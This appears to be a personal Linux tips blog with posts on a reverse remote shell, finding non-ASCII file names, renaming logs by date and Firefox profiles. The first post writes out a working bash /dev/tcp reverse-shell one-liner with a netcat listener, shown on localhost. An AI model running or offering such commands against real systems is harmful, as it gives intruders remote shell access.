
Tuesday, March 28, 2017

Tip: Quick and dirty reverse remote shell

Here is how to get a reverse remote shell. I say reverse because the remote system connects to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it:
nc -l 12345
This starts netcat listening on port 12345. Then, in a second terminal, run the following command (the port must be the one netcat listens on):
/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1'
You won't notice anything in the first window where the nc command is running, but try entering some command there, e.g. pwd. :) What you've got is a remote shell. Obviously, because of the way things work you don't get a prompt and other fancy stuff, but it works and that's what matters. :)

What you basically did is run an interactive bash process (the -i option) with standard output and standard error redirected to /dev/tcp/127.0.0.1/12345 (the >& redirection operator), and with standard input read from the same connection (the trailing 0>&1, which duplicates file descriptor 1 onto file descriptor 0). The path being redirected to and from is not a real file: it is a special bash notation that makes the shell open a network connection, with the syntax:
/dev/<protocol>/<ipaddress>/<port>
where <protocol> is tcp or udp. More details can be found in the bash manual page.

Tuesday, November 1, 2016

Short Tip: Find files with non-printable ASCII characters

I have a directory full of different files obtained from the Internet, and it turned out that some of their names contain UTF-8 characters, because of which indexing didn't work. So, I had to find all files with such characters in their names. The solution I found was the following one:
LC_ALL=C find . -name '*[! -~]*'
This command prints all file names containing non-ASCII bytes, with those bytes shown as question marks. A few facts about this command:
  1. The assignment (LC_ALL=C) temporarily switches to the C locale for the duration of the find(1) command. The effect is that find(1) will not interpret multibyte UTF-8 sequences but treats its input strictly byte by byte.
  2. find(1) then searches for file names that contain a character outside printable ASCII. To see this, take a look at the glob pattern. The first and last star mean that the bracket expression can match anywhere within the file name. The bracket expression, on the other hand, specifies a class of characters outside (the exclamation mark negates the range) the range from space (ASCII code 32) to tilde (ASCII code 126).
The output of find(1) will show a question mark in every place where a byte has a value below 32 or above 126. To see which Unicode character is at that place, you can pipe the output to, e.g., the cat(1) command, like this:
LC_ALL=C find . -name '*[! -~]*' | cat
This works because cat(1) runs with the UTF-8 locale still selected (the LC_ALL assignment applies only to find) and the multibyte sequences used in UTF-8 reach the terminal intact. Actually, if you want to nitpick, cat isn't going to interpret anything; it passes the bytes through, and the terminal, which is set up to handle UTF-8, does the actual interpretation.
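As an added example (not from the post), here is a wrapper around the find command above that also dumps the offending bytes in hex, which tells a UTF-8 sequence apart from a stray control character such as a tab. It assumes GNU find plus the POSIX tr and od utilities; the demo creates constructed files in a temporary directory.

```shell
#!/bin/sh
# Added example, not from the post. For every file name under $1 containing a
# byte outside printable ASCII (32..126), print the path followed by the hex
# values of exactly those bytes, e.g. "<dir>/café.txt c3a9" for a UTF-8 e-acute.
# Names containing a newline are the one case this read loop cannot handle.
nonascii_names() {
    dir="$1"
    # LC_ALL=C applies to find only: the glob then matches byte by byte.
    LC_ALL=C find "$dir" -name '*[! -~]*' -print | while IFS= read -r f; do
        # Keep only the bytes outside ' '..'~' and dump them as hex.
        hex=$(printf '%s' "${f##*/}" | LC_ALL=C tr -d ' -~' | od -An -tx1 | tr -d ' \n')
        printf '%s %s\n' "$f" "$hex"
    done
}

# Constructed demo: one plain name, one UTF-8 name, one name with a tab in it.
demo_dir=$(mktemp -d)
touch "$demo_dir/plain.txt" "$demo_dir/café.txt" "$demo_dir/$(printf 'tab\there.log')"
nonascii_names "$demo_dir"   # lists café.txt with c3a9 and the tab name with 09
rm -rf "$demo_dir"
```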

Saturday, February 28, 2015

Short Tip: Renaming log files to include date...

I had a bunch of log files named in the format logfilename.N.gz, but I wanted to rename them to logfilename.YYYYMMDD.gz, where YYYYMMDD is the date when the file was last modified. I did it using the following for loop:
for i in logfilename.*.gz
do
    mv -i "$i" "logfilename.$(date -r "$i" +%Y%m%d).gz"
done
The -r argument to the date(1) command tells it to use the last modification time (mtime) of the file given as the option's argument (this is GNU date; BSD date gives -r a different meaning). Note that it is also possible to use the stat(1) command instead of date(1).

Thursday, November 3, 2011

Using multiple instances of Firefox...

Firefox has a great feature called Profiles. You can use them to have multiple instances of the browser. If you wonder why you would use something like that, here are a few reasons:
  • you might want to separate professional from private browsing, or to have a development or hacking environment distinct from your "usual" environment.
  • you might want to try out some new plugin without messing up your existing profiles.
  • you have a large number of installed plugins that considerably slow down the browser, or can even make it unresponsive, so you want to group them into different instances.
When you start the browser by running the firefox command, either from the command line or from a GUI launcher, it will find an existing running instance of the browser and activate it. So, in order to run a new instance you have to use the command line option --no-remote. Also, to select a profile other than the default one, use the -P option. If you don't give an argument to this option, Firefox starts with the profile selection dialog. In this dialog you can select the profile that should be run, but you can also create new profiles and delete existing ones.

Finally, I mentioned in the introduction that I use different plugins in different profiles. But the NoScript plugin I use in every instance, as I regard it as one of the most important security additions to the browser. I strongly recommend that you install this plugin too!
